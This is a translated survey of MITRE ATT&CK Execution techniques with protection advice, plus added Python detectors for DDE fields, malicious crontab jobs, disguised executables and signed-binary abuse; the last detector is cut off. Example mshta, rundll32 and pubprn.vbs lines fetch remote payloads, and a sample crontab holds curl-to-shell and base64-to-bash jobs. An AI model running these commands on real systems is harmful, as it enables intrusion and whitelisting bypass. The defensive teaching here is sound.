Studying Adversarial Tactics, Techniques & Common Knowledge (ATT&CK). Enterprise Tactics. Part 2


    Links to all parts:
    Part 1. Initial Access
    Part 2. Execution
    Part 3. Persistence
    Part 4. Privilege Escalation
    Part 5. Defense Evasion
    Part 6. Credential Access
    Part 7. Discovery
    Part 8. Lateral Movement

    The “Execution” phase describes the tools and methods an attacker uses to run, locally or remotely, the commands, scripts and executable files that were delivered to the target system during the previous phase.

    The author is not responsible for any consequences of applying the information in this article and apologizes for possible inaccuracies in some wording and terms. The published material is a free retelling of the contents of MITRE ATT&CK.


    AppleScript

    System: macOS
    Permissions: User
    Description: AppleScript can work with Apple Events, the messages that applications exchange for interprocess communication (IPC). With Apple Events you can interact with almost any application that is open locally or remotely, triggering actions such as opening windows and sending keystrokes. Scripts are run with the command osascript -e <script>.
    Attackers can use AppleScript to interact with open SSH connections, move to remote hosts, and even present fake dialog boxes to users. AppleScript can also be used in more common attacks, such as setting up a reverse shell.

    Protection recommendations: Require that AppleScript scripts be signed by a trusted developer before they are allowed to run.

    CMSTP (AppLocker ByPass - CMSTP)

    System: Windows
    Permissions: User
    Description: The Microsoft Connection Manager Profile Installer (cmstp.exe) is a utility built into Windows for installing Connection Manager service profiles. cmstp.exe accepts an INF file as a parameter, so an attacker can prepare a malicious INF that loads and executes DLLs or scriptlets (*.sct) from remote servers, bypassing AppLocker and other application whitelisting controls, because cmstp.exe is signed with a Microsoft digital certificate.

    Protection recommendations: Block potentially dangerous applications. Monitor executions of C:\Windows\System32\cmstp.exe.

    Command-Line Interface

    System: Windows, Linux, macOS
    Permissions: User, Administrator, System
    Description: The command-line interface can be used locally, remotely through remote access software, through a reverse shell, and so on. Commands run with the permission level of the command-line interpreter process unless the command invokes a process that changes permissions (for example, a scheduled task).

    Security tips: Audit and/or block command-line interpreters using tools such as AppLocker or Software Restriction Policies.

    Control Panel Items (Windows Control Panel Items)

    System: Windows
    Permissions: User, Administrator, System
    Description: The technique is to use Windows Control Panel items to execute arbitrary commands (the Reaver malware, for example, does this). Malicious objects can be disguised as standard Control Panel items and delivered with phishing attachments. Control Panel items are registered EXE files and CPL files used to view and configure Windows settings. CPL files are actually renamed DLLs that can be run in the following ways:
    • directly from the command line: control.exe <file.cpl>;
    • through the API functions of shell32.dll: rundll32.exe shell32.dll,Control_RunDLL <file.cpl>;
    • by double-clicking the .cpl file.

    Registered CPLs stored in System32 are automatically shown in Control Panel and have a unique GUID stored in the registry key:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace

    Information about other CPLs, such as the display name and the path to the .cpl file, is stored in the Cpls and Extended Properties subkeys of:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel

    Some CPLs launched through the shell are registered under:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\shellex\PropertySheetHandlers

    Protection recommendations: Restrict the launch and storage of Control Panel files to protected folders only (for example, C:\Windows\System32), and use User Account Control (UAC) and AppLocker to prevent unauthorized changes to the system. And, of course, use anti-virus software.

    Dynamic Data Exchange Protocol (DDE), Macro-less Code Exec in MSWord

    System: Windows
    Permissions: User
    Description: DDE is an inter-application protocol for exchanging data and messages through shared memory. For example, a Word document can contain a table that is updated automatically from an Excel workbook. The technique abuses this legacy feature of MS Office rather than a memory-corruption bug: attackers embed objects in MS Office documents that carry commands to be executed when the document is opened. For example, a Word document can contain a field whose code is {DDEAUTO <command, for example c:\windows\system32\cmd.exe>}, which runs when the document is opened. Although Microsoft has since disabled it by default, DDE can still be re-enabled, including on Windows 10 with MS Office 2016, with the value:
    AllowDDE (DWORD) = 2 under the registry key:
    HKEY_CURRENT_USER\Software\Microsoft\Office\<Office version>\Word\Security

    Security tips: Follow Microsoft's recommendations and install the corresponding MS Office update. On Windows 10 you can also enable Attack Surface Reduction (ASR) rules to block DDE attacks and the spawning of child processes by MS Office applications.
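
    As an added example (not part of the original article or of MITRE ATT&CK), the following Python script opens a .docx as the zip archive it is and searches every Word XML part for DDE or DDEAUTO field codes, joining field instructions that Word splits across several w:instrText runs, which is how such fields are commonly obfuscated. The sample documents are constructed inline with a minimal helper and are not real Word output; the field text in the malicious sample mirrors the cmd.exe example above.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS

# DDE or DDEAUTO at the start of the field instruction; attackers sometimes
# hide the keyword behind a leading QUOTE field or extra whitespace.
DDE_RE = re.compile(r"^\s*(?:QUOTE\s+)?DDE(?:AUTO)?\b", re.IGNORECASE)


def _field_instructions(xml_bytes):
    """Yield the complete instruction text of every field in one XML part."""
    root = ET.fromstring(xml_bytes)
    # Simple fields carry the whole instruction in one attribute.
    for fld in root.iter(W + "fldSimple"):
        instr = fld.get(W + "instr")
        if instr:
            yield instr
    # Complex fields: <fldChar begin/> ... <instrText/>* ... <fldChar separate|end/>.
    # The instruction is often split across several instrText runs, so join them.
    depth, buf = 0, []
    for elem in root.iter():
        if elem.tag == W + "fldChar":
            kind = elem.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
                buf = []
            elif kind in ("separate", "end") and depth:
                if buf:
                    yield "".join(buf)
                    buf = []
                if kind == "end":
                    depth -= 1
        elif elem.tag == W + "instrText" and depth:
            buf.append(elem.text or "")


def find_dde_fields(docx_bytes):
    """Return [(part name, instruction)] for every DDE/DDEAUTO field in a .docx."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            # Fields can live in headers, footers and footnotes, not only document.xml.
            if name.startswith("word/") and name.endswith(".xml"):
                for instr in _field_instructions(zf.read(name)):
                    if DDE_RE.search(instr):
                        hits.append((name, instr.strip()))
    return hits


def build_docx(paragraph_xml):
    """Constructed minimal .docx (not a real Word export) wrapping paragraph_xml."""
    doc = ('<?xml version="1.0" encoding="UTF-8"?>'
           '<w:document xmlns:w="%s"><w:body><w:p>%s</w:p></w:body></w:document>'
           % (W_NS, paragraph_xml))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", doc)
    return buf.getvalue()


# Constructed samples: a harmless DATE field and a DDEAUTO field split over two runs.
BENIGN_DOCX = build_docx(
    '<w:fldSimple w:instr=" DATE \\* MERGEFORMAT "><w:r><w:t>1 Jan</w:t></w:r></w:fldSimple>')
DDE_DOCX = build_docx(
    '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
    '<w:r><w:instrText>AUTO c:\\\\windows\\\\system32\\\\cmd.exe "/k calc.exe"</w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
    '<w:r><w:t>Click Yes to update the document</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r>')

if __name__ == "__main__":
    print(find_dde_fields(BENIGN_DOCX))
    print(find_dde_fields(DDE_DOCX))
```

    The same scan applies to any Office Open XML container (.docx, .dotx, .docm) and is cheap enough to run on a mail gateway before the file reaches a user.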

    Execution through API

    System: Windows
    Rights: User, Administrator, System
    Description: Attackers can use the Windows API to execute binaries. API functions such as CreateProcess let programs and scripts start processes with the required paths and arguments. API functions that can be used to execute binaries:
    • CreateProcessA(), CreateProcessW();
    • CreateProcessAsUserA(), CreateProcessAsUserW();
    • CreateProcessInternalA(), CreateProcessInternalW();
    • CreateProcessWithLogonW(), CreateProcessWithTokenW();
    • LoadLibraryA(), LoadLibraryW();
    • LoadLibraryExA(), LoadLibraryExW();
    • LoadModule();
    • LoadPackagedLibrary();
    • WinExec();
    • ShellExecuteA(), ShellExecuteW();
    • ShellExecuteExA(), ShellExecuteExW().

    Security tips: Calls to these API functions are common and hard to distinguish from malicious activity. The protection effort should be aimed at preventing the attacker's tools from running at the beginning of the attack chain, at identifying malicious behavior, and at blocking potentially dangerous software.

    Execution through the Windows module loader (Execution through Module Load)

    System: Windows
    Permissions: User
    Description: Code execution can be arranged through the Windows module loader in NTDLL.dll, which can load a DLL from an arbitrary local path or UNC network path. This functionality is part of the Windows Native API and is called by Win32 API functions such as CreateProcess() and LoadLibrary().

    Protection recommendations: Calls to API functions are standard OS functionality and hard to distinguish from malicious activity. The protection effort should be aimed at preventing the attacker's tools from running at the beginning of the attack chain. It also makes sense to consider restricting DLL loading to the %SystemRoot% and %ProgramFiles% directories.

    Exploitation for Client Execution

    System: Windows, Linux, macOS
    Permissions: User
    Description: The technique involves remote code execution through exploits for user-facing software. Vulnerabilities in software are often the result of developers violating secure programming requirements, which ultimately makes unexpected program behavior possible.
    Some types of exploits:
    • Browser exploits. Web browsers are targeted through drive-by downloads and phishing links. The system can be compromised through an ordinary browser after the user performs a certain action, such as clicking a link in a phishing email.
    • Office application exploits. Malicious files are delivered as attachments or download links. The user must open the document or file for the exploit to run.
    • Third-party application exploits. Common applications such as Adobe Reader and Flash, widely used in corporate environments, are targeted by attackers. Depending on the software and the nature of the vulnerability, exploitation happens in the browser or when the user opens a file; for example, Flash objects can be delivered inside MS Office documents.

    Protection recommendations: Install updates for the applications in use promptly. Isolate potentially vulnerable applications with sandboxes, microsegmentation and virtualization tools, for example Sandboxie for Windows and AppArmor or Docker for Linux. Exploit protection systems are also recommended, for example Windows Defender Exploit Guard (WDEG) on Windows 10 or the Enhanced Mitigation Experience Toolkit (EMET) on earlier versions of Windows.

    Graphical User Interface

    System: Windows, Linux, macOS
    Permissions: User, Administrator, system
    Description: An executable file or script is launched by interacting with it through a graphical user interface (GUI) in an interactive or remote session, for example over RDP.

    Security tips: Protect credentials that can be used to connect to the system remotely. Identify unnecessary system utilities and third-party software that can be used to obtain an interactive remote session.


    InstallUtil

    System: Windows
    Permissions: User
    Description: InstallUtil is a Windows command-line utility that installs and uninstalls applications conforming to the .NET Framework specifications. It ships with the .NET Framework. InstallUtil.exe is signed with a Microsoft certificate and is stored at:
    C:\Windows\Microsoft.NET\Framework\v[version]\InstallUtil.exe
    Attackers can use InstallUtil to proxy code execution and bypass application whitelisting.

    Security tips: InstallUtil may not be needed on your systems, so consider blocking the launch of InstallUtil.exe.

    LSASS Driver

    System: Windows
    Permissions: Administrator, System
    Description: The Local Security Authority (LSA) is the Windows subsystem responsible for user authentication. LSA consists of several interconnected DLLs that run inside the lsass.exe process. Attackers can target lsass.exe by replacing or adding illegitimate LSA drivers and then executing arbitrary code. The technique is used by the Pasam and Wingbird malware, which drop modified DLLs that are loaded by lsass.exe. In that case the malicious code runs before the illegitimate DLL causes lsass.exe to crash.

    Protection recommendations: On Windows 8.1 and Windows Server 2012 R2, enable LSA protection by setting the registry value:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL
    to dword:00000001

    This protection ensures that LSA plug-ins and drivers are loaded only if they carry a Microsoft digital signature. On Windows 10 and Server 2016, enable Windows Defender Credential Guard to run lsass.exe in an isolated virtual environment. Enable safe DLL search mode to reduce the risk of malicious libraries being loaded into lsass.exe:
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode = 1


    Launchctl

    System: macOS
    Permissions: User, Administrator
    Description: launchctl is the utility for managing launchd. With launchctl you can manage system and user services (LaunchDaemons and LaunchAgents) as well as execute commands and programs. launchctl accepts subcommands on the command line, interactively, or redirected from standard input:
    launchctl submit -l [labelname] -- /Path/to/thing/to/execute "arg" "arg" "arg"
    By starting and restarting services, attackers can execute code and even bypass application whitelisting if launchctl is an allowed process; loading, unloading and reloading services and daemons, however, may require elevated privileges.

    Protection recommendations: Restrict user rights to create Launch Agents and launch Launch Daemons through group policy. The KnockKnock application can discover programs that use launchctl to manage Launch Agents and Launch Daemons.

    Execution using local scheduling tasks (Local Job Scheduling)

    System: Linux, macOS
    Privileges: User, Administrator, root
    Description: Attackers can create jobs on compromised systems to launch programs without authorization at system boot or on a schedule. Linux and Apple systems support several methods of scheduling periodic background jobs: cron, at, launchd. Unlike the Windows Task Scheduler, scheduling on Linux systems cannot be done remotely except through a remote session such as SSH.

    Protection recommendations: Restrict user rights to create scheduled jobs, and block system utilities and other software that can be used to schedule jobs.
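
    The following is an added example, not from the article or from MITRE, of what the audit side of this technique looks like on Linux: a small Python script that parses a user crontab (five schedule fields or an @reboot-style keyword followed by the command, the format crontab -l prints) and flags entries with attacker-typical traits such as @reboot persistence, execution from /tmp or /dev/shm, hidden path components, curl-to-shell pipes and runtime base64 decoding. The crontab text is constructed for the example, and the heuristics are illustrative starting points, not a complete ruleset.

```python
import re

# A user crontab job line: five schedule fields or an @keyword, then the command.
CRON_ENTRY = re.compile(r"^(@\w+\s+|(?:\S+\s+){5})(.+)$")
ENV_ASSIGNMENT = re.compile(r"^\w+=")

# Illustrative heuristics, not an exhaustive ruleset.
SUSPICIOUS = [
    ("runs from a temporary or shared-memory path",
     re.compile(r"(^|[\s;|&=])(/tmp|/var/tmp|/dev/shm)/")),
    ("downloads and pipes to a shell",
     re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|k)?sh\b", re.I)),
    ("decodes base64 at runtime",
     re.compile(r"\bbase64\s+(-d\b|--decode\b)", re.I)),
    ("reverse-shell pattern",
     re.compile(r"/dev/tcp/|\b(nc|ncat|netcat)\b.*\s-e\s", re.I)),
    ("runs from a hidden path component",
     re.compile(r"/\.[A-Za-z0-9_-][^/\s]*")),
]


def parse_crontab(text):
    """Yield (line number, schedule, command) for each job line in a user crontab."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
            continue  # comments and MAILTO=/PATH= style assignments are not jobs
        m = CRON_ENTRY.match(line)
        if m:
            yield lineno, m.group(1).strip(), m.group(2).strip()


def audit_crontab(text):
    """Return a finding dict for every job line that trips at least one heuristic."""
    findings = []
    for lineno, schedule, command in parse_crontab(text):
        reasons = []
        if schedule == "@reboot":
            reasons.append("runs at boot (@reboot)")
        for label, pattern in SUSPICIOUS:
            if pattern.search(command):
                reasons.append(label)
        if reasons:
            findings.append({"line": lineno, "schedule": schedule,
                             "command": command, "reasons": reasons})
    return findings


# Constructed sample crontab: two legitimate jobs and three attacker-style ones.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://203.0.113.5/a.sh | sh
@reboot /tmp/.X11-unix/.sysd -q
30 3 * * 1 echo cHdkCg== | base64 -d | bash
0 * * * * /usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print("line %d: %s  <- %s" % (f["line"], f["command"], "; ".join(f["reasons"])))
```

    In practice you would feed it the output of crontab -l -u <user> for every account, plus the files under /var/spool/cron; the system crontab (/etc/crontab, /etc/cron.d) carries an extra user field after the schedule and needs a slightly different splitter.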


    Mshta

    System: Windows
    Permissions: User
    Description: mshta.exe (located in C:\Windows\System32\) is the utility that executes Microsoft HTML Applications (*.hta). HTA applications run on the same technologies Internet Explorer uses, but outside the browser. Because mshta processes files without the browser's security settings, attackers can use mshta.exe to proxy execution of malicious HTA files, JavaScript or VBScript. The malicious file can be launched with an inline script:
    mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

    or directly by URL:
    mshta http[:]//webserver/payload[.]hta

    Security tips: The functionality of mshta.exe is tied to older versions of IE that have reached end of life. Block mshta.exe if you do not use its functionality.


    PowerShell

    System: Windows
    Permissions: User, Administrator
    Description: PowerShell (PS) is a powerful interactive command-line interface and scripting environment included with Windows. Attackers can use PS to gather information and execute code. For example, the Start-Process cmdlet can start an executable file, and the Invoke-Command cmdlet executes a command locally or on a remote computer. PS can also download and run executables from the Internet without saving them to disk. Remote connections with PS require administrative rights. There are a number of tools for attacking with PS:

    Protection tips: PS can be removed from the system if it is not needed. If PS is required, restrict its use to administrators and allow only signed scripts to execute. Disable the WinRM service to prevent remote execution of PS scripts. Note that there are methods of bypassing PS script execution policies.

    Regsvcs / Regasm

    System: Windows
    Permissions: User, Administrator
    Description: Regsvcs and Regasm are Windows command-line utilities used to register .NET Component Object Model (COM) assemblies. Both files are digitally signed by Microsoft. Attackers can use Regsvcs and Regasm to proxy code execution by marking, with the [ComRegisterFunction] or [ComUnregisterFunction] attribute, code that must run before registration or unregistration. Code with these attributes is executed even if the process runs with insufficient privileges and fails at startup.

    Security tips: Block Regsvcs.exe and Regasm.exe if they are not used on your systems or network.

    Regsvr32 (Squiblydoo)

    System: Windows
    Permissions: User, Administrator
    Description: Regsvr32.exe is a console utility for registering and unregistering OLE controls in the registry, such as ActiveX controls and DLLs. Regsvr32.exe is digitally signed by Microsoft and can be used to proxy code execution. For example, Regsvr32 can load an XML file containing JScript or VBScript fragments (COM scriptlets, *.sct) that are executed to bypass application whitelisting.

    Protection recommendations: Attack Surface Reduction (ASR) in EMET and Advanced Threat Protection in Windows Defender can block the use of Regsvr32.exe to bypass whitelisting.

    Rundll32 (Poweliks)

    System: Windows
    Permissions: User
    Description: Rundll32.exe is a system utility for running code in dynamic link libraries; it can be called to proxy execution of a binary and to run Windows Control Panel files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes Rundll32.exe to run. Rundll32 can also execute scripts such as JavaScript:
    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")
    The above use of rundll32.exe is detected by anti-virus software as the Poweliks malware.
    Protection tips: Attack Surface Reduction (ASR) in EMET and Advanced Threat Protection in Windows Defender can block the use of Rundll32.exe to bypass whitelisting.

    Running with Windows task scheduling (Scheduled Task)

    System: Windows
    Permissions: User, Administrator, System
    Description: Utilities such as at, schtasks and the Windows Task Scheduler can be used to schedule programs and scripts to run at a specific date and time. A task can be scheduled on a remote system provided that RPC is used for authentication and file and printer sharing is enabled. Administrator rights on the remote system are also required. Attackers can use remote task scheduling to execute programs at system startup or in the context of a specific account.

    Protection recommendations: Restrict the ability of users to create tasks that run as System through the registry:
    HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl = 0
    Note: SubmitControl = 1 allows members of the Server Operators group to create tasks.

    Also configure the corresponding GPO setting:
    Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Increase scheduling priority
    Consider using the PowerSploit framework, which contains the PowerUp module for finding weak permissions on scheduled tasks, in your own work.


    Scripting

    System: Windows, Linux, macOS
    Permissions: User
    Description: Attackers use scripts to automate their actions, speed up operational tasks and, as a result, reduce the time needed to gain access. Some scripting languages can bypass process monitoring by interacting with the OS directly at the API level instead of calling other programs. Scripts can be embedded in Office documents as macros and used in phishing attacks; here the attackers count on the user launching the file with the macro or agreeing to enable macros. Several popular scripting frameworks exist: Metasploit, Veil, PowerSploit.

    Security tips: Restrict access to scripting engines such as VBScript or PowerShell. On Windows, configure MS Office security settings by enabling Protected View and disabling macros via GPO. If macros are needed, allow only digitally signed macros to run. Use microsegmentation and application virtualization, for example Sandboxie for Windows and AppArmor or Docker for Linux.

    Start of services (Service Execution)

    System: Windows
    Rights: Administrator, System
    Description: Attackers can execute a binary, command or script by interacting with Windows services, for example through the Service Control Manager (SCM), which can create new services and modify running ones.

    Protection recommendations: Make sure the current privilege configuration prevents low-privileged users from starting high-privileged services. Make sure that high-privileged executables on the system cannot be replaced or modified by users with lower permissions. Consider restricting the launch of potentially dangerous programs with AppLocker and Software Restriction Policies.

    Execution through signed binaries (Signed Binary Proxy Execution)

    System: Windows
    Permissions: User
    Description: Binaries signed with trusted digital certificates can run on Windows systems protected by digital signature verification. Several Microsoft-signed files installed with Windows by default can be used to proxy the execution of other files:
    Mavinject.exe is a Windows utility that allows code execution. Mavinject can be used to inject a DLL into a running process:
    "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" [PID] /INJECTRUNNING [PATH DLL]
    C:\Windows\system32\mavinject.exe [PID] /INJECTRUNNING [PATH DLL]
    SyncAppvPublishingServer.exe can be used to run PowerShell scripts without launching powershell.exe.
    There are several similar binaries.

    Security tips: Many signed files may not be needed on your systems, so consider blocking their launch.

    Execution through signed scripts (Signed Script Proxy Execution)

    System: Windows
    Permissions: Users
    Description: Scripts signed with trusted certificates can be used to proxy execution of malicious files; for example, PubPrn.vbs is signed with a Microsoft certificate and can be used to launch a file from a remote server:
    cscript C:\Windows\System32\Printing_Admin_Scripts\ru-RU\pubprn.vbs script:http[:]//

    Security recommendations: Such signed scripts may not be needed on your systems, so consider blocking their launch.

    Source Command

    System: Linux and macOS
    Privileges: User
    Description: source is a shell built-in that reads and executes all commands from the specified file in the current shell, so any environment variables it sets are visible to all scripts and commands launched afterwards. It can be invoked in two ways:
    source /path/to/filename [arguments] or . /path/to/filename [arguments]
    Note the space after the dot. Without the space, ./path/to/filename runs the file as a separate program in a new process instead. Attackers can use source to execute files that do not have the executable (x) permission bit set.

    Protection recommendations: Preventing the use of built-in shell commands is difficult because they are legitimate, so the protection effort must be directed at stopping malicious actions at earlier stages of the attack, for example at delivery or when a malicious file is created on the system.

    Space after Filename

    System: Linux, macOS
    Permissions: User
    Description: Attackers can hide the true file type by changing its extension. For certain file types (this does not work with .app bundles), adding a space character to the end of the file name changes how the operating system handles the file. For example, if there is a Mach-O executable named evil.bin, double-clicking it makes the OS launch Terminal.app and execute it. If the same file is renamed evil.txt, double-clicking opens it in a text editor. But if the file is renamed "evil.txt " (with a trailing space), double-clicking makes the OS determine the true file type and launch the binary. Attackers can use this technique to trick users into launching a malicious executable.

    Protection recommendations: This technique is hard to prevent because the attacker uses standard operating system mechanisms, so the protection effort must be directed at stopping malicious actions at earlier stages of the attack, for example at delivery or when a malicious file is created on the system.
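
    Added example (not part of the article): because the trick relies on the extension lying about the content, a detector can do what the OS does and look at the magic bytes. The Python below classifies a file by its first bytes (Mach-O thin and fat images, ELF, PE, shebang scripts) and reports a trailing space in the name, a document extension on executable content, and a document-then-executable double extension. It also relates to the Control Panel Items section above in that a .cpl is expected to be a PE DLL, so that pairing is deliberately not flagged. The sample headers are real magic values with fabricated bodies; .app bundles are directories and are out of scope here.

```python
import struct

# Mach-O magic numbers as read big-endian from the first four bytes; thin
# images appear in both byte orders, fat (universal) binaries as CAFEBABE.
MACHO_THIN = {0xFEEDFACE, 0xFEEDFACF, 0xCEFAEDFE, 0xCFFAEDFE}
FAT_MAGICS = {0xCAFEBABE, 0xBEBAFECA}
DOCUMENT_EXTS = {".txt", ".pdf", ".doc", ".docx", ".rtf", ".jpg", ".png"}
EXECUTABLE_EXTS = {".exe", ".dll", ".cpl", ".scr", ".pif", ".bin", ".sh", ".command"}


def file_kind(data):
    """Classify by magic bytes: 'mach-o', 'elf', 'pe', 'script' or 'other'."""
    if data[:4] == b"\x7fELF":
        return "elf"
    if data[:2] == b"MZ":
        return "pe"  # .exe, .dll and renamed DLLs such as .cpl all start here
    if data[:2] == b"#!":
        return "script"
    if len(data) >= 8:
        magic, second = struct.unpack(">II", data[:8])
        if magic in MACHO_THIN:
            return "mach-o"
        # CAFEBABE is shared with Java class files: a fat Mach-O header's
        # second word is the architecture count (small), a class file's is
        # its version (45 or higher), which separates the two.
        if magic in FAT_MAGICS and second < 20:
            return "mach-o"
    return "other"


def assess(name, data):
    """Return the reasons a file looks like a disguised executable (empty if none)."""
    reasons = []
    if name != name.rstrip():
        reasons.append("trailing whitespace in file name")
    parts = name.rstrip().lower().split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    kind = file_kind(data)
    if kind != "other" and ext in DOCUMENT_EXTS:
        reasons.append("%s executable with document extension %s" % (kind, ext))
    if len(parts) > 2 and "." + parts[-2] in DOCUMENT_EXTS and ext in EXECUTABLE_EXTS:
        reasons.append("double extension %s%s" % ("." + parts[-2], ext))
    return reasons


def scan(files):
    """files: {name: leading bytes}; returns only the entries with findings."""
    out = {}
    for name, data in files.items():
        reasons = assess(name, data)
        if reasons:
            out[name] = reasons
    return out


# Constructed samples: real header bytes, fabricated bodies.
MACHO64 = b"\xcf\xfa\xed\xfe" + b"\x07\x00\x00\x01" + b"\x00" * 8   # x86_64, little-endian
PE_STUB = b"MZ\x90\x00" + b"\x00" * 12
JAVA_CLASS = b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + b"\x00" * 8      # Java 8 class, not a fat Mach-O
SAMPLES = {
    "evil.txt ": MACHO64,          # the trailing-space trick from the text
    "evil.txt": MACHO64,           # extension lies, but no trailing space
    "notes.txt": b"just text\n",
    "invoice.pdf.exe": PE_STUB,
    "Main.class": JAVA_CLASS,
    "appwiz.cpl": PE_STUB,         # a .cpl is expected to be a PE DLL
}

if __name__ == "__main__":
    for name, reasons in scan(SAMPLES).items():
        print(repr(name), "->", "; ".join(reasons))
```

    Reading only the first few bytes of each file keeps this cheap enough to run over a Downloads folder or a mail quarantine; a full scanner would also follow the fat header into each architecture slice and check the Mach-O load commands.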

    Run with third-party network administration software (Third-party Software)

    System: Windows, Linux, macOS
    Permissions: User, Administrator, System
    Description: This attack vector targets third-party software and software deployment systems used on the network for administrative purposes (SCCM, VNC, HBSS, Altiris, etc.). An attacker who gains access to such a system can execute code remotely on every host managed by the deployment system. The rights required depend on the specific configuration of the systems: local credentials may suffice to reach the deployment server, but an administrator account may be needed to start a deployment.

    Protection recommendations: Check the security level of your software deployment systems. Ensure that access to software management systems is limited, controlled and protected. Strictly enforce policies requiring prior approval for remote software deployment. Grant access to deployment systems to a limited number of administrators and isolate the deployment system. Make sure that credentials for the deployment system are unique and not reused by other services on the corporate network. If the deployment system is configured to run only signed binaries, verify that the signing certificates are not stored on the deployment system itself but on a system that cannot be reached remotely.

    Trap Command

    System: Linux, macOS
    Rights: User, Administrator
    Description: The trap command protects a script from interruptions (Ctrl+C, Ctrl+D, Ctrl+Z, etc.). If the script receives a signal listed in the arguments of trap, it handles the signal itself and the shell does not process it. Attackers can use trap to register code that runs when the shell receives particular signals.

    Protection recommendations: This technique is hard to prevent because the attacker uses standard operating system mechanisms. The protection effort should be directed at stopping malicious actions at earlier stages of the attack, for example at delivery or when a malicious file is created on the system.

    Execution through trusted software development utilities (Trusted Developer Utilities)

    System: Windows
    Rights: User
    Description: Many utilities used by software developers can execute code in various forms during development, debugging and reverse engineering. These utilities are often signed with digital certificates, which lets them proxy the execution of malicious code on the OS, bypassing protection mechanisms and application whitelisting.

    MSBuild is the build platform used by Visual Studio. It uses project files in XML form that describe the requirements for building different platforms and configurations. From .NET version 4, MSBuild allows C# code to be inserted into an XML project, compiled and then executed. MSBuild.exe is signed with a Microsoft digital certificate.
    DNX, the .NET Execution Environment (dnx.exe), is a software development kit shipped with Visual Studio Enterprise. It was deprecated in 2016 in favor of the .NET Core CLI. DNX is not present in standard Windows installations and is found only on developer hosts that use .NET Core and ASP.NET Core 1.0. Dnx.exe is signed with a digital certificate and can be used to proxy code execution.
    RCSI is a non-interactive command-line interface for C#, similar to csi.exe. It was introduced in an early version of the Roslyn .NET compiler platform. Rcsi.exe is signed with a Microsoft digital certificate. C# script files (.csx) can be written and executed with Rcsi.exe from the Windows command line.
    WinDbg/CDB: WinDbg is the Microsoft Windows kernel and user-mode debugger; the console debugger cdb.exe is also a user-mode debugger. Both can be used as standalone tools. They are normally used for software development and reverse engineering and are not found on ordinary Windows systems. Both WinDbg.exe and CDB.exe are signed with a Microsoft digital certificate and can be used to proxy code execution.
    Tracker is the file tracking utility tracker.exe, included with .NET as part of MSBuild. It is used to log calls to the Windows file system. Attackers can use tracker.exe to proxy execution of a DLL into other processes. Tracker.exe is also signed with a Microsoft certificate.

    Protection recommendations: Remove all of the above files from the system if users do not need them for their intended purpose.
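
    As an added example (not from the article or from MITRE), here is a detection pass in Python over process-creation events covering the signed-binary proxy techniques described in the CMSTP, Mshta, Regsvr32, Rundll32, Regsvcs/Regasm, InstallUtil, Signed Binary Proxy Execution and Trusted Developer Utilities sections above. Each rule pairs the binary name with the command-line shape the abuse needs, and a match whose parent process is an Office application is raised to high severity. The events are constructed dicts with the fields a Sysmon Event ID 1 or Windows 4688 record carries; the patterns are starting points that need tuning against your own baseline (for instance, MSBuild is only flagged for project files under user-writable paths).

```python
import re


def rule(name, image, cmdline):
    return name, re.compile(image, re.I), re.compile(cmdline, re.I)


# (rule name, image regex, command-line regex). Illustrative patterns only.
RULES = [
    rule("CMSTP loading an INF", r"(^|\\)cmstp\.exe$",
         r"(^|\s)/(ni|s)\b.*\.inf\b|\.inf\b.*(^|\s)/(ni|s)\b"),
    rule("Mshta inline script or URL", r"(^|\\)mshta\.exe$",
         r"(vbscript|javascript):|https?://|\.hta\b"),
    rule("Regsvr32 scriptlet (Squiblydoo)", r"(^|\\)regsvr32\.exe$",
         r"/i:\s*\S*(https?:|\.sct\b)|scrobj\.dll"),
    rule("Rundll32 running script", r"(^|\\)rundll32\.exe$",
         r"javascript:|RunHTMLApplication"),
    rule("Regasm/Regsvcs unregister", r"(^|\\)reg(asm|svcs)\.exe$",
         r"(^|\s)/u(nregister)?\b"),
    rule("InstallUtil uninstall trick", r"(^|\\)installutil\.exe$",
         r"/logfile=|(^|\s)/u(ninstall)?\b"),
    rule("Mavinject DLL injection", r"(^|\\)mavinject(32)?\.exe$",
         r"/injectrunning\b"),
    rule("SyncAppvPublishingServer running PowerShell",
         r"(^|\\)syncappvpublishingserver\.(exe|vbs)$",
         r";\s*(\(|\$|new-object|invoke|iex|start-process)"),
    rule("MSBuild project from user-writable path", r"(^|\\)msbuild\.exe$",
         r"\\(users|programdata|temp)\\.*\.(xml|csproj|proj)\b"),
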